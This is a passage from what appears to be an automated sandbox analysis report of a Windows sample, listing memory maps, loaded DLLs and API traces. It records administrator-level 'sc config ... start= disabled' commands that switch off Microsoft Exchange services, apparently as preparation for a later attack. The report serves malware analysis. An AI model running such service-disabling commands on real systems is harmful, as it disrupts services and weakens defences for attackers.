0x9ae4500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009ae4500000" filename = "" Region: id = 8793 start_va = 0x9ae4510000 end_va = 0x9ae4516fff entry_point = 0x0 region_type = private name = "private_0x0000009ae4510000" filename = "" Region: id = 8794 start_va = 0x9ae4520000 end_va = 0x9ae461ffff entry_point = 0x0 region_type = private name = "private_0x0000009ae4520000" filename = "" Region: id = 8795 start_va = 0x9ae4620000 end_va = 0x9ae46ddfff entry_point = 0x9ae4620000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8796 start_va = 0x9ae46e0000 end_va = 0x9ae471ffff entry_point = 0x0 region_type = private name = "private_0x0000009ae46e0000" filename = "" Region: id = 8797 start_va = 0x9ae4720000 end_va = 0x9ae4720fff entry_point = 0x0 region_type = private name = "private_0x0000009ae4720000" filename = "" Region: id = 8798 start_va = 0x9ae4730000 end_va = 0x9ae4730fff entry_point = 0x0 region_type = private name = "private_0x0000009ae4730000" filename = "" Region: id = 8799 start_va = 0x9ae4810000 end_va = 0x9ae481ffff entry_point = 0x0 region_type = private name = "private_0x0000009ae4810000" filename = "" Region: id = 8800 start_va = 0x9ae4820000 end_va = 0x9ae49a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009ae4820000" filename = "" Region: id = 8801 start_va = 0x9ae49b0000 end_va = 0x9ae4b30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009ae49b0000" filename = "" Region: id = 8802 start_va = 0x9ae4b40000 end_va = 0x9ae5f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009ae4b40000" filename = "" Region: id = 8803 start_va = 0x7ff6c39a0000 end_va = 0x7ff6c3a9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c39a0000" filename = "" Region: id = 8804 start_va = 0x7ff6c3acc000 end_va = 0x7ff6c3acdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3acc000" filename = "" Region: id = 8805 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8806 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8807 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8808 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8809 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8810 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8811 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8812 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8813 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8814 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8815 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8816 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8817 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8818 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 545 os_tid = 0xd40 Thread: id = 546 os_tid = 0xcac Thread: id = 547 os_tid = 0xccc Process: id = "169" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x29162000" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "167" os_parent_pid = "0xcd0" cmd_line = "sc config MSExchangeServiceHost start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8832 start_va = 0x1d0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8833 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8834 start_va = 0x200000 end_va = 0x213fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 8835 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 8836 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 8837 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8838 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8839 start_va = 0x2c0000 end_va = 0x2c1fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 8840 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 8841 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 8842 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8843 start_va = 0x7eb60000 end_va = 0x7eb82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb60000" filename = "" Region: id = 8844 start_va = 0x7eb89000 end_va = 0x7eb89fff entry_point = 0x0 region_type = private name = "private_0x000000007eb89000" filename = "" Region: id = 8845 start_va = 0x7eb8c000 end_va = 0x7eb8efff entry_point = 0x0 region_type = private name = "private_0x000000007eb8c000" filename = "" Region: id = 8846 start_va = 0x7eb8f000 end_va = 0x7eb8ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb8f000" filename = "" Region: id = 8847 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8848 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8849 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8850 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8851 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8852 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 8853 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8854 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8855 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 8856 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8857 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8858 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 8859 start_va = 0x2d0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 8860 start_va = 0x440000 end_va = 0x4fdfff entry_point = 0x440000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8861 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 8862 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 8863 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8864 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8865 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8866 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8867 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8868 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8869 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8870 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8871 start_va = 0x7ea60000 end_va = 0x7eb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea60000" filename = "" Region: id = 8872 start_va = 0x7eb86000 end_va = 0x7eb88fff entry_point = 0x0 region_type = private name = "private_0x000000007eb86000" filename = "" Region: id = 8873 start_va = 0x600000 end_va = 0x6defff entry_point = 0x600000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8874 start_va = 0x540000 end_va = 0x551fff entry_point = 0x540000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 549 os_tid = 0xd24 [0133.542] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0133.542] __set_app_type (_Type=0x1) [0133.542] __p__fmode () returned 0x77ac4d6c [0133.542] __p__commode () returned 0x77ac5b1c [0133.542] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0133.542] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0133.543] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.545] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.545] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.545] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0133.545] _wcsicmp (_String1="config", _String2="query") returned -14 [0133.546] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0133.546] _wcsicmp (_String1="config", _String2="start") returned -16 [0133.546] _wcsicmp (_String1="config", _String2="pause") returned -13 [0133.546] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0133.546] _wcsicmp (_String1="config", _String2="control") returned -14 [0133.546] _wcsicmp (_String1="config", _String2="continue") returned -14 [0133.546] _wcsicmp (_String1="config", _String2="stop") returned -16 [0133.546] _wcsicmp (_String1="config", _String2="config") returned 0 [0133.546] ResolveDelayLoadedAPI () returned 0x77262c10 [0133.546] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x348568 [0133.548] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0133.548] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0133.548] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0133.548] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0133.548] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0133.548] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0133.548] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0133.548] OpenServiceW (hSCManager=0x348568, lpServiceName="MSExchangeServiceHost", dwDesiredAccess=0x3) returned 0x0 [0133.548] GetLastError () returned 0x424 [0133.548] _ultow (in: _Dest=0x424, _Radix=2751424 | out: _Dest=0x424) returned="1060" [0133.548] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0133.550] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x29fb9c, nSize=0x2, Arguments=0x29fbb4 | out: lpBuffer="裸4ﯜ)蔔è") returned 0x62 [0133.550] GetFileType (hFile=0x3c) returned 0x2 [0133.550] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x29fb80 | out: lpMode=0x29fb80) returned 1 [0133.550] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x3488f8*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x29fb90, lpReserved=0x0 | out: lpBuffer=0x3488f8*, lpNumberOfCharsWritten=0x29fb90*=0x62) returned 1 [0133.550] LocalFree (hMem=0x3488f8) returned 0x0 [0133.550] LocalFree (hMem=0x0) returned 0x0 [0133.550] CloseServiceHandle (hSCObject=0x348568) returned 1 [0133.551] LocalFree (hMem=0x0) returned 0x0 [0133.551] exit (_Code=1060) Thread: id = 550 os_tid = 0xd30 Process: id = "170" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xd30d000" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeSA start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8875 start_va = 0x70000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 8876 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 8877 start_va = 0xa0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 8878 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8879 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 8880 start_va = 0x200000 end_va = 0x203fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 8881 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 8882 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 8883 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8884 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 8885 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8886 start_va = 0x7eac0000 end_va = 0x7eae2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eac0000" filename = "" Region: id = 8887 start_va = 0x7eae9000 end_va = 0x7eae9fff entry_point = 0x0 region_type = private name = "private_0x000000007eae9000" filename = "" Region: id = 8888 start_va = 0x7eaec000 end_va = 0x7eaeefff entry_point = 0x0 region_type = private name = "private_0x000000007eaec000" filename = "" Region: id = 8889 start_va = 0x7eaef000 end_va = 0x7eaeffff entry_point = 0x0 region_type = private name = "private_0x000000007eaef000" filename = "" Region: id = 8890 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8891 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8892 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8893 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8894 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8895 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 8896 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8897 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8898 start_va = 0x4520000 end_va = 0x461ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 8899 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8940 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 8941 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8942 start_va = 0x270000 end_va = 0x32dfff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8943 start_va = 0x330000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 8944 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 8945 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8946 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8947 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8948 start_va = 0x7e9c0000 end_va = 0x7eabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9c0000" filename = "" Region: id = 8949 start_va = 0x7eae6000 end_va = 0x7eae8fff entry_point = 0x0 region_type = private name = "private_0x000000007eae6000" filename = "" Region: id = 8950 start_va = 0x90000 end_va = 0x93fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 8951 start_va = 0x230000 end_va = 0x233fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 8952 start_va = 0x4620000 end_va = 0x4956fff entry_point = 0x4620000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 551 os_tid = 0xd14 [0133.706] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0133.706] __set_app_type (_Type=0x1) [0133.706] __p__fmode () returned 0x77ac4d6c [0133.706] __p__commode () returned 0x77ac5b1c [0133.706] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0133.706] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0133.706] GetCurrentThreadId () returned 0xd14 [0133.706] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd14) returned 0x84 [0133.707] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0133.707] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0133.707] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.709] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.709] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ffa4c | out: phkResult=0x1ffa4c*=0x0) returned 0x2 [0133.709] VirtualQuery (in: lpAddress=0x1ffa53, lpBuffer=0x1ffa04, dwLength=0x1c | out: lpBuffer=0x1ffa04*(BaseAddress=0x1ff000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.709] VirtualQuery (in: lpAddress=0x100000, lpBuffer=0x1ffa04, dwLength=0x1c | out: lpBuffer=0x1ffa04*(BaseAddress=0x100000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.709] VirtualQuery (in: lpAddress=0x101000, lpBuffer=0x1ffa04, dwLength=0x1c | out: lpBuffer=0x1ffa04*(BaseAddress=0x101000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.709] VirtualQuery (in: lpAddress=0x103000, lpBuffer=0x1ffa04, dwLength=0x1c | out: lpBuffer=0x1ffa04*(BaseAddress=0x103000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.709] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x1ffa04, dwLength=0x1c | out: lpBuffer=0x1ffa04*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0133.709] GetConsoleOutputCP () returned 0x1b5 [0133.709] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.710] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0133.710] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.710] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0133.710] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.710] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0133.710] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.710] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0133.710] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.710] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0133.710] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.710] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0133.711] GetEnvironmentStringsW () returned 0x4527d90* [0133.711] FreeEnvironmentStringsA (penv="A") returned 1 [0133.711] GetEnvironmentStringsW () returned 0x4527d90* [0133.711] FreeEnvironmentStringsA (penv="A") returned 1 [0133.711] RegOpenKeyExW (in: hKey=0x80000002, 